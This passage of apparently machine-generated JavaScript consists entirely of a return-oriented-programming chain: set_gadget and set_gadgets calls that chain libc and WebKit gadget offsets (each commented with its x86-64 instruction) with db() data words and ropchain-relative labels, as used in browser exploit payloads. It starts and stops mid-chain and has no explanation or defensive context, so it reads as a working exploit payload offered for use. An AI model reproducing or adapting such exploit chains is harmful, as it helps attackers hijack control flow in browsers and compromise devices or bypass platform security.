set_gadget(libc_base+144605,); //pop rdi //L5334: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+280072, //L5337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+280040, //L5335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280056, //L5336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+280152, //L5338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5338: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5340: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+280272, //L5343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+280256, //L5341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5341: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5343: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+280384, //L5344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+280416, //L5346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280400, //L5345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 
//pop rcx ]); //L5344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5345: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5346: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+280584, //L5349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+280552, //L5347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280568, //L5348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5347: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5348: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5349: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+428453, //mov rax, rdx libc_base+764760, //pop rsi ropchain+280768, //L5353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+280736, //L5351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280752, //L5352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5350: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5351: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5352: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5353: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+280824, //L5355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5355: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, 
//sar edi, cl libc_base+764760, //pop rsi ropchain+280952, //L5357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+280968, //L5358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+280936, //L5356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5356: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5358: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281048, //L5359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+281064, //L5360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5360: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281152, //L5361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281168, //L5363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5361: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5363: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5364: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5366: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+281328, //L5369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+281312, //L5367 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5367: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5369: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+281488, //L5373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+281456, //L5371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+281472, //L5372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5370: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5371: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5373: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+281544, //L5375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5375: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+281672, //L5377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+281688, //L5378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281656, //L5376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5376: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281848, //L5382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+281816, 
//L5380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281832, //L5381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5379: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5381: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5382: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+281904, //L5384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5384: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+282032, //L5386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282048, //L5387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282016, //L5385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5385: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5387: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282128, //L5388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282144, //L5389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5388: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5389: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282240, //L5391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282224, //L5390 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5390: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5391: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+282320, //L5392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5392: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5393: db([10, 0]); // 0xa set_gadget(libc_base+144605,); //pop rdi //L5394: db([10, 0]); // 0xa set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282464, //L5395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282496, //L5397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282480, //L5396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5397: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+282672, //L5399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282688, //L5400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+282656, //L5398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 
]); //L5398: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282800, //L5402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282848, //L5405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282816, //L5403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5402: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5403: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5405: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+282960, //L5406+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+282952, //L5406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5406: db([0, 0]); // 0x0 set_gadgets([ ropchain+282976, //L5406+24 ropchain+284112, //L5401 libc_base+759608 //pop rax ]); //L5407: db([48, 0]); // 0x30 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+283064, //L5408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5410: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+283184, //L5413 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+283168, //L5411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5411: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5413: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+283344, //L5417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+283312, //L5415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+283328, //L5416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5414: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5415: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5416: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5417: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+283400, //L5419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5419: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+283528, //L5421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+283544, //L5422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283512, //L5420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5420: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5421: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5422: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+283704, 
//L5426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+283672, //L5424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283688, //L5425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5423: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5424: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5425: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5426: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+283760, //L5428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5428: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+283888, //L5430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+283904, //L5431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283872, //L5429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5429: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5430: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5431: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+284016, //L5432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+284048, //L5434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+284032, //L5433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5432: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 
//L5433: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+782311, //pop rsp ropchain+286504, //L5435 //L5401: libc_base+764760, //pop rsi ropchain+284152, //L5436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5436: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5438: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+284272, //L5441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+284256, //L5439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5439: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5441: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+284448, //L5444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+284464, //L5445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+284416, //L5442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+284432, //L5443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5442: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5443: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi 
ropchain+284560, //L5447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+284544, //L5446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5446: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5447: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5448: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5449: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L5450: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+284760, //L5452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5452: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+284816, //L5453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5453: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+284952, //L5457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+284936, //L5456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5455: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); 
//pop r9 //L5456: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5457: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+285088, //L5460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+285120, //L5462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285072, //L5459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5459: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5460: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5461: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5462: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+285232, //L5463+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+285224, //L5463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5463: db([0, 0]); // 0x0 set_gadgets([ ropchain+285248, //L5463+24 ropchain+285280, //L5458 libc_base+759608 //pop rax ]); //L5465: db([65, 0]); // 0x41 set_gadgets([ libc_base+782311, //pop rsp ropchain+285296, //L5464 //L5458: libc_base+759608 //pop rax ]); //L5466: db([97, 0]); // 0x61 //L5464: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+285368, //L5467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5467: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5469: db([4294967255, 4294967295]); // -0x29 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+285488, //L5472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+285472, //L5470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5470: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5472: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+285648, //L5476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+285616, //L5474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+285632, //L5475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5473: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5476: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+285704, //L5478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5478: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+285832, //L5480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+285848, //L5481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285816, //L5479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5479: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5480: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5481: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286008, //L5485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+285976, //L5483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285992, //L5484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5482: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5483: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5484: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5485: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+286064, //L5487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5487: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+286192, //L5489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286208, //L5490 